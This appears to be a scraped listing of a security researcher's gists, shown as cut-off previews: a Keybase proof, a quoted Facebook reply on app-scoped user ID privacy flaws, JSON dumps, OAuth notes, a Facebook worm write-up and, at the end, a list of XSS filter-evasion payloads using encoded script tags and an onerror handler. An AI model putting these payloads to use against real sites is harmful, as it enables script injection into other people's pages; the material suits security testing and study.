phwd

Keybase proof

I hereby claim:

• I am phwd on github.
• I am phwd (https://keybase.io/phwd) on keybase.
• I have a public key whose fingerprint is E782 8CF3 2CEB D621 EF7A 22AD 3A1D DCCA B2A1 1AD5

To claim this, I am signing this object:

phwd

Response from Facebook

As you saw, the Facebook API is now versioned: https://developers.facebook.com/docs/apps/versions. That means any apps created today can only make requests to the v2 API, but apps created before the announcement can make requests to the v1 API until it expires as well as to the v2 API. That’s a necessary step since an application can’t always upgrade to v2 of the API in one synchronous step (ie: if a single app ID powers a number of mobile apps as well as a web app). To support that behavior, we support app-scoped UIDs even via the v1 API. And that’s where we run into problems 😉

Generally speaking, you identified three potential issues:

Given an app-scoped UID for v2 app X, it is possible to make requests to the v1 API with a v1 app Y and get back data.
Given an app-scoped UID, you can browse to https://www.facebook.com/app_scoped_user_id/APP-SCOPED-UID and trivially see the real user.
http://graph.facebook.com/APP-SCOPED-UID returns information about the user
The behavior in #1/#3 w

phwd

require 'openssl'
require 'base64'
require 'json'
require 'httpclient'

http = HTTPClient.new(:agent_name => useragent)
key = "" #The Private key
login_info = {:guid => "00000000-0000-0000-0000-000000000000",
                  :password => "PASSWORD", 
                  :username => "USERNAME", 

phwd

{
  "pages-named(Facebook Security)": {
    "url": "https://www.facebook.com/search/str/Facebook%2BSecurity/pages-named",
    "results": {
      "count": 177,
      "nodes": [
        {
          "id": "31987371885",
          "url": "https://www.facebook.com/security",
          "name": "Facebook Security",

phwd

{
	"700554543387711": {
		"id": "700554543387711",
		"latest_version": {
			"id": "455210147987840",
			"article_canonical_url": "http:\/\/www.buzzfeed.com\/expresident\/steps-to-instantly-improve-your-day",
			"article_version_number": 2,
			"cover_media": {
				"__type__": {
					"name": "DocumentVideoElement"

phwd

9 dir 117150 svn+ssh://tubbs/svnroot/tfb/releases/thefacebook-r116496-fb95/www/lib/display/privacy svn+ssh://tubbs/svnroot 2008-08-05T21:47:04.536211Z 114218 chad svn:special svn:externals svn:needs-lock 2c7ba8d8-a2f7-0310-a573-de162e16dcc7  pages.php file 2008-08-18T18:50:32.000000Z e69ad78841111ae71df858b23a4d356c 2008-08-05T21:47:04.536211Z 114218 chad 8328  ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������

phwd

I did a bit of initial OAuth research this week for FxA (Firefox Accounts). It was interrupted by more pressing stuff (bugs bugs bugs), but thought I'd post my incomplete work-in-progress notes for whenever I get back to this.

Notes come from Getting Started with OAuth 2.0, which I accessed via Safari.

my next steps:

• look carefully at a number of JS SDKs
• think in terms of a generic OAuth abstraction for FxOS
• but begin by building the simplest possible solution for FxA on FxOS
  • we really need implicit grant,
• and a proxy server that could handle redirects on behalf of serverless apps,

phwd

            DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
                    Version 2, December 2004

 Copyright (C) 2011 YOUR_NAME_HERE <YOUR_URL_HERE>

 Everyone is permitted to copy and distribute verbatim or modified
 copies of this license document, and changing it is allowed as long
 as the name is changed.

            DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE

phwd

Digging into a Facebook Worm

http://i.imgur.com/zc2A8vJ.png

Facebook worms are interesting

The following was a link that was shared to me (You probably shouldn't click it)

https://www.facebook.com/l.php?u=https%3A%2F%2Fcdn.fbsbx.com%2Fhphotos-xpa1%2Fv%2Ft59.2708-21%2F12447002_1746605272238633_1642381431_n.html%2FV1DE0-9682.html%3Foh%3D8a665fb34c8793a92fd02cceb31d4b01%26oe%3D5718116B%26dl%3D1&h=cAQHPcYE7

phwd

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>        
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>